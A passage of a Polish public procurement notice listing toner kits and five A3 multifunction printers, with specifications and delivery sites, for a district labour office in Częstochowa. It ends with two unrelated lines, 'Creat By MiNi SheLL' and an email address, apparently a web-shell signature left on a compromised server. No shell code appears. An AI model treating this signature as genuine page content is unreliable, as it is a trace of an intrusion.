20	Komplet materiałów eksploatacyjnych do urządzeń wielofunkcyjnych laserowych monochromatycznych  wymienionych w pkt 2.2 - oryginalny producenta urządzenia lub zamiennik w pełni kompatybilny z ww. urządzeniem o wydajności dla toneru monochromatycznego 7000 stron - zgodnie z normą ISO/IEC 19752 (wymagane potwierdzenie kompatybilności oraz wydajności oświadczeniem dostawcy oraz wymagana kopia raportu z testu zawartego w ww. normie).	20 szt.
21	Komplet materiałów eksploatacyjnych do urządzenia wielofunkcyjnego laserowego kolorowego wymienionego w pkt 2.3 - oryginalny producenta drukarki lub zamiennik w pełni kompatybilny z ww. urządzeniem o wydajności dla toneru czarnego 3500 stron oraz o wydajności dla tonerów kolorowych 2800 stron - zgodnie z normą ISO/IEC 19798 (wymagane potwierdzenie kompatybilności oraz wydajności oświadczeniem dostawcy oraz wymagana kopia raportu z testu zawartego w ww. normach).	2 kpl.
22	Komplet tonerów do drukarki laserowej kolorowej A3 wymienionej w pkt 2.4 - oryginalny producenta drukarki lub zamiennik w pełni kompatybilny z ww. urządzeniem o wydajności dla tonera 8000 stron - zgodnie z normą ISO/IEC 19798 (wymagane potwierdzenie kompatybilności oraz wydajności oświadczeniem dostawcy oraz wymagana kopia raportu z testu zawartego w ww. normach).	2 kpl..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.00.00-0, 30.21.31.00-6, 30.23.21.10-8, 30.23.72.00-1, 32.42.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> część II zamówienia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II przetargu

Zakup, dostawa, montaż i uruchomienie 5 sztuk wielofunkcyjnych monochromatycznych urządzeń drukujących A3 obejmuje:
a) dostarczenie elementów urządzenia wielofunkcyjnego, łącznie z rozładunkiem urządzeń i materiałów oraz transportem na miejsce instalacji.
-dostawa 4 szt. urządzeń do budynku Powiatowego Urzędu Pracy przy ul. Szymanowskiego 15 w Częstochowie
-dostawa 1 szt. urządzenia do budynku Gminnego Centrum Pracy przy ul. Rzecznej 29 w Koniecpolu
b) montażu urządzenia we wskazanym miejscu,
c) uruchomienie urządzenia,
- konfiguracji urządzeń wchodzących w skład systemu,
- wykonania testów działania urządzenia,
- przeszkolenia 2 osób wskazanych przez Zamawiającego z zakresu obsługi na każde zainstalowane urządzenie

Specyfikacja techniczna
Technologia druku laserowa, toner jednoskładnikowy
Szybkość kopiowania/drukowania 30 kopii/min. format A4, 20 kopii/min. format A3
Rozdzielczość kopiowania/drukowania 600x600dpi / 1200dpi
Zoom 25 - 400%
Rozmiar oryginału do A3
Rozmiar kopii A6R - A3
Pamięć 512MB + dysk HDD 40GB drukarki
Podawanie papieru standard: dwie uniwersalne kasety - po 500 ark., podajnik ręczny 200 ark.,
Dupleks automatyczny
Wydajność miesięczna 100 000 kopii A4
Drukarka sieciowa z portem komunikacyjnym Ethernet 10/100 Base-T (RJ-45)
Protokół sieciowy TCP/IP
Dodatkowe porty komunikacyjne USB 2.0, dwukierunkowy port równoległy (IEEE 1284)
Automatyczny dwustronny podajnik dokumentów
Oryginalny stolik / szafka metalowa w komplecie
Dwustronny kolorowy skaner sieciowy
Format wyjściowy skanowanych dokumentów: PDF, TIFF
Składowanie dokumentów skanowanych FTP, SMB, poczta elektroniczna
Zainstalowany finiszer dokumentów na co najmniej 3000 kartek A4 możliwość zszywania w 3 pozycjach
Mailbox posiadający co najmniej 7 tac o pojemności nie mniej niż 100 kartek A4 każda.
Zainstalowany separator zadań co najmniej 100 kartkowy
Wyświetlacz LCD Dotykowy
W zestawie do każdego urządzenia toner startowy + 2 szt. tonera zapasowego (o wydajności min. 34 000 stron przy 5% zaciemnieniu - dotyczy tonera zapasowego)
Fabrycznie zainstalowany bęben Min. 300 000 kopii A4
Pobór energii elektrycznej do 1100W
Oprogramowanie: sterowniki drukarki dla systemu MS Windows Server 2000/2003 PL, MS Windows XP Pro PL, MS Windows Vista Biznes PL wraz z nośnikiem
Oprogramowanie: skanera sieciowego wraz z nośnikiem
Gwarancja 36 miesięcy.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.10-8, 32.42.00.00-3, 30.19.21.13-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com